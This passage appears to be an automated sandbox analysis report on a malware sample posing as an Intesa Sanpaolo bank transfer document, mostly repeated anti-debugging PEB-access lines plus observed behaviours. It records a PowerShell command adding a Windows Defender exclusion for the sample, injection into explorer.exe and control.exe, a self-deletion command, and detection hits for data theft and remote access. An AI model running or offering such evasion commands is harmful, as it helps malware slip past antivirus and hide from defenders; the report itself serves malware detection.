          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_01194500 mov eax, dword ptr fs:[00000030h]6_2_01194500
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_01194500 mov eax, dword ptr fs:[00000030h]6_2_01194500
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010EE53E mov eax, dword ptr fs:[00000030h]6_2_010EE53E
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010EE53E mov eax, dword ptr fs:[00000030h]6_2_010EE53E
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010EE53E mov eax, dword ptr fs:[00000030h]6_2_010EE53E
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010EE53E mov eax, dword ptr fs:[00000030h]6_2_010EE53E
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010EE53E mov eax, dword ptr fs:[00000030h]6_2_010EE53E
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010D0535 mov eax, dword ptr fs:[00000030h]6_2_010D0535
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010D0535 mov eax, dword ptr fs:[00000030h]6_2_010D0535
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010D0535 mov eax, dword ptr fs:[00000030h]6_2_010D0535
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010D0535 mov eax, dword ptr fs:[00000030h]6_2_010D0535
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010D0535 mov eax, dword ptr fs:[00000030h]6_2_010D0535
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010D0535 mov eax, dword ptr fs:[00000030h]6_2_010D0535
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010C8550 mov eax, dword ptr fs:[00000030h]6_2_010C8550
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010C8550 mov eax, dword ptr fs:[00000030h]6_2_010C8550
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010F656A mov eax, dword ptr fs:[00000030h]6_2_010F656A
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010F656A mov eax, dword ptr fs:[00000030h]6_2_010F656A
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010F656A mov eax, dword ptr fs:[00000030h]6_2_010F656A
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010F4588 mov eax, dword ptr fs:[00000030h]6_2_010F4588
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010C2582 mov eax, dword ptr fs:[00000030h]6_2_010C2582
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010C2582 mov ecx, dword ptr fs:[00000030h]6_2_010C2582
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010FE59C mov eax, dword ptr fs:[00000030h]6_2_010FE59C
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_011405A7 mov eax, dword ptr fs:[00000030h]6_2_011405A7
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_011405A7 mov eax, dword ptr fs:[00000030h]6_2_011405A7
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_011405A7 mov eax, dword ptr fs:[00000030h]6_2_011405A7
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010E45B1 mov eax, dword ptr fs:[00000030h]6_2_010E45B1
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010E45B1 mov eax, dword ptr fs:[00000030h]6_2_010E45B1
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010FE5CF mov eax, dword ptr fs:[00000030h]6_2_010FE5CF
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010FE5CF mov eax, dword ptr fs:[00000030h]6_2_010FE5CF
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010C65D0 mov eax, dword ptr fs:[00000030h]6_2_010C65D0
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010FA5D0 mov eax, dword ptr fs:[00000030h]6_2_010FA5D0
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010FA5D0 mov eax, dword ptr fs:[00000030h]6_2_010FA5D0
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010FC5ED mov eax, dword ptr fs:[00000030h]6_2_010FC5ED
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010FC5ED mov eax, dword ptr fs:[00000030h]6_2_010FC5ED
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010EE5E7 mov eax, dword ptr fs:[00000030h]6_2_010EE5E7
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010EE5E7 mov eax, dword ptr fs:[00000030h]6_2_010EE5E7
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010EE5E7 mov eax, dword ptr fs:[00000030h]6_2_010EE5E7
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010EE5E7 mov eax, dword ptr fs:[00000030h]6_2_010EE5E7
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010EE5E7 mov eax, dword ptr fs:[00000030h]6_2_010EE5E7
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010EE5E7 mov eax, dword ptr fs:[00000030h]6_2_010EE5E7
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010EE5E7 mov eax, dword ptr fs:[00000030h]6_2_010EE5E7
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010EE5E7 mov eax, dword ptr fs:[00000030h]6_2_010EE5E7
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010C25E0 mov eax, dword ptr fs:[00000030h]6_2_010C25E0
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010F8402 mov eax, dword ptr fs:[00000030h]6_2_010F8402
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010C8BF0 mov eax, dword ptr fs:[00000030h]6_2_010C8BF0
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_0114CA11 mov eax, dword ptr fs:[00000030h]6_2_0114CA11
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010EEA2E mov eax, dword ptr fs:[00000030h]6_2_010EEA2E
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010FCA24 mov eax, dword ptr fs:[00000030h]6_2_010FCA24
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010FCA38 mov eax, dword ptr fs:[00000030h]6_2_010FCA38
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010E4A35 mov eax, dword ptr fs:[00000030h]6_2_010E4A35
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010E4A35 mov eax, dword ptr fs:[00000030h]6_2_010E4A35
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010D0A5B mov eax, dword ptr fs:[00000030h]6_2_010D0A5B
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010D0A5B mov eax, dword ptr fs:[00000030h]6_2_010D0A5B
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010C6A50 mov eax, dword ptr fs:[00000030h]6_2_010C6A50
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010C6A50 mov eax, dword ptr fs:[00000030h]6_2_010C6A50
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010C6A50 mov eax, dword ptr fs:[00000030h]6_2_010C6A50
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010C6A50 mov eax, dword ptr fs:[00000030h]6_2_010C6A50
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010C6A50 mov eax, dword ptr fs:[00000030h]6_2_010C6A50
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010C6A50 mov eax, dword ptr fs:[00000030h]6_2_010C6A50
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010C6A50 mov eax, dword ptr fs:[00000030h]6_2_010C6A50
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010FCA6F mov eax, dword ptr fs:[00000030h]6_2_010FCA6F
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010FCA6F mov eax, dword ptr fs:[00000030h]6_2_010FCA6F
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010FCA6F mov eax, dword ptr fs:[00000030h]6_2_010FCA6F
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_0113CA72 mov eax, dword ptr fs:[00000030h]6_2_0113CA72
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_0113CA72 mov eax, dword ptr fs:[00000030h]6_2_0113CA72
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010CEA80 mov eax, dword ptr fs:[00000030h]6_2_010CEA80
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010CEA80 mov eax, dword ptr fs:[00000030h]6_2_010CEA80
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010CEA80 mov eax, dword ptr fs:[00000030h]6_2_010CEA80
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010CEA80 mov eax, dword ptr fs:[00000030h]6_2_010CEA80
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010CEA80 mov eax, dword ptr fs:[00000030h]6_2_010CEA80
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010CEA80 mov eax, dword ptr fs:[00000030h]6_2_010CEA80
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010CEA80 mov eax, dword ptr fs:[00000030h]6_2_010CEA80
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010CEA80 mov eax, dword ptr fs:[00000030h]6_2_010CEA80
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010CEA80 mov eax, dword ptr fs:[00000030h]6_2_010CEA80
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_01194A80 mov eax, dword ptr fs:[00000030h]6_2_01194A80
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010F8A90 mov edx, dword ptr fs:[00000030h]6_2_010F8A90
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010C8AA0 mov eax, dword ptr fs:[00000030h]6_2_010C8AA0
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010C8AA0 mov eax, dword ptr fs:[00000030h]6_2_010C8AA0
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_01116AA4 mov eax, dword ptr fs:[00000030h]6_2_01116AA4
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010C0AD0 mov eax, dword ptr fs:[00000030h]6_2_010C0AD0
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_01116ACC mov eax, dword ptr fs:[00000030h]6_2_01116ACC
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_01116ACC mov eax, dword ptr fs:[00000030h]6_2_01116ACC
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_01116ACC mov eax, dword ptr fs:[00000030h]6_2_01116ACC
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010F4AD0 mov eax, dword ptr fs:[00000030h]6_2_010F4AD0
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010F4AD0 mov eax, dword ptr fs:[00000030h]6_2_010F4AD0
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010FAAEE mov eax, dword ptr fs:[00000030h]6_2_010FAAEE
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010FAAEE mov eax, dword ptr fs:[00000030h]6_2_010FAAEE
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_01178D10 mov eax, dword ptr fs:[00000030h]6_2_01178D10
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_01178D10 mov eax, dword ptr fs:[00000030h]6_2_01178D10
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010DAD00 mov eax, dword ptr fs:[00000030h]6_2_010DAD00
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010DAD00 mov eax, dword ptr fs:[00000030h]6_2_010DAD00
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010DAD00 mov eax, dword ptr fs:[00000030h]6_2_010DAD00
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010F4D1D mov eax, dword ptr fs:[00000030h]6_2_010F4D1D
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010B6D10 mov eax, dword ptr fs:[00000030h]6_2_010B6D10
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010B6D10 mov eax, dword ptr fs:[00000030h]6_2_010B6D10
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010B6D10 mov eax, dword ptr fs:[00000030h]6_2_010B6D10
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_01148D20 mov eax, dword ptr fs:[00000030h]6_2_01148D20
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010C8D59 mov eax, dword ptr fs:[00000030h]6_2_010C8D59
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010C8D59 mov eax, dword ptr fs:[00000030h]6_2_010C8D59
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010C8D59 mov eax, dword ptr fs:[00000030h]6_2_010C8D59
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010C8D59 mov eax, dword ptr fs:[00000030h]6_2_010C8D59
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010C8D59 mov eax, dword ptr fs:[00000030h]6_2_010C8D59
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010C0D59 mov eax, dword ptr fs:[00000030h]6_2_010C0D59
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010C0D59 mov eax, dword ptr fs:[00000030h]6_2_010C0D59
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010C0D59 mov eax, dword ptr fs:[00000030h]6_2_010C0D59
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_01158D6B mov eax, dword ptr fs:[00000030h]6_2_01158D6B
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010F6DA0 mov eax, dword ptr fs:[00000030h]6_2_010F6DA0
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010E8DBF mov eax, dword ptr fs:[00000030h]6_2_010E8DBF
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010E8DBF mov eax, dword ptr fs:[00000030h]6_2_010E8DBF
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_01194DAD mov eax, dword ptr fs:[00000030h]6_2_01194DAD
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_01188DAE mov eax, dword ptr fs:[00000030h]6_2_01188DAE
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_01188DAE mov eax, dword ptr fs:[00000030h]6_2_01188DAE
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010FCDB1 mov ecx, dword ptr fs:[00000030h]6_2_010FCDB1
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010FCDB1 mov eax, dword ptr fs:[00000030h]6_2_010FCDB1
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010FCDB1 mov eax, dword ptr fs:[00000030h]6_2_010FCDB1
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_01144DD7 mov eax, dword ptr fs:[00000030h]6_2_01144DD7
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_01144DD7 mov eax, dword ptr fs:[00000030h]6_2_01144DD7
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010EEDD3 mov eax, dword ptr fs:[00000030h]6_2_010EEDD3
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010EEDD3 mov eax, dword ptr fs:[00000030h]6_2_010EEDD3
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010BCDEA mov eax, dword ptr fs:[00000030h]6_2_010BCDEA
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010BCDEA mov eax, dword ptr fs:[00000030h]6_2_010BCDEA
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_01160DF0 mov eax, dword ptr fs:[00000030h]6_2_01160DF0
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_01160DF0 mov eax, dword ptr fs:[00000030h]6_2_01160DF0
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010CADE0 mov eax, dword ptr fs:[00000030h]6_2_010CADE0
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010CADE0 mov eax, dword ptr fs:[00000030h]6_2_010CADE0
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010CADE0 mov eax, dword ptr fs:[00000030h]6_2_010CADE0
          Source: C:\Windows\SysWOW64\control.exe Code function: 8_2_00223E2E GetProcessHeap, HeapFree
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe Process token adjusted: Debug
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
          Source: C:\Windows\SysWOW64\control.exe Code function: 8_2_002242F0 SetUnhandledExceptionFilter, UnhandledExceptionFilter, GetCurrentProcess, TerminateProcess
          Source: C:\Windows\SysWOW64\control.exe Code function: 8_2_00224550 SetUnhandledExceptionFilter
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe Memory allocated: page read and write | page guard

          HIPS / PFW / Operating System Protection Evasion

          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe"
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe NtClose: Indirect: 0x107A56C
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe NtQueueApcThread: Indirect: 0x107A4F2
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe Memory written: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe base: 400000 value starts with: 4D5A
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe Section loaded: NULL target: C:\Windows\SysWOW64\control.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\control.exe Section loaded: NULL target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\control.exe Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe Thread register set: target process: 2592
          Source: C:\Windows\SysWOW64\control.exe Thread register set: target process: 2592
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe Thread APC queued: target process: C:\Windows\explorer.exe
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe Section unmapped: C:\Windows\SysWOW64\control.exe base address: 220000
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe Process created: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe "C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe"
          Source: C:\Windows\SysWOW64\control.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe"
          Source: explorer.exe, 00000007.00000002.3765982163.0000000000BB0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000000.1362027793.0000000004040000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1367583891.00000000088B8000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000007.00000002.3765982163.0000000000BB0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000000.1359553518.0000000000BB0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
          Source: explorer.exe, 00000007.00000000.1359239004.00000000005A8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3765674382.00000000005A0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ProgmanZw
          Source: explorer.exe, 00000007.00000002.3765982163.0000000000BB0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000000.1359553518.0000000000BB0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
          Source: explorer.exe, 00000007.00000002.3765982163.0000000000BB0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000000.1359553518.0000000000BB0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: yProgram Manager
          Source: C:\Windows\SysWOW64\control.exe; Code function: 8_2_00224775 GetSystemTimeAsFileTime, GetCurrentProcessId, GetCurrentThreadId, GetTickCount, QueryPerformanceCounter
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe; Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Stealing of Sensitive Information

          Source: Yara match; File source: 6.2.Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match; File source: 6.2.Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match; File source: 00000008.00000002.3765357944.0000000002530000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match; File source: 00000006.00000002.1420736628.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match; File source: 00000008.00000002.3766029603.0000000002BF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match; File source: 00000000.00000002.1362056479.000000000389E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match; File source: 00000008.00000002.3765947649.0000000002BC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

          Remote Access Functionality

          Source: Yara match; File source: 6.2.Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match; File source: 6.2.Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match; File source: 00000008.00000002.3765357944.0000000002530000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
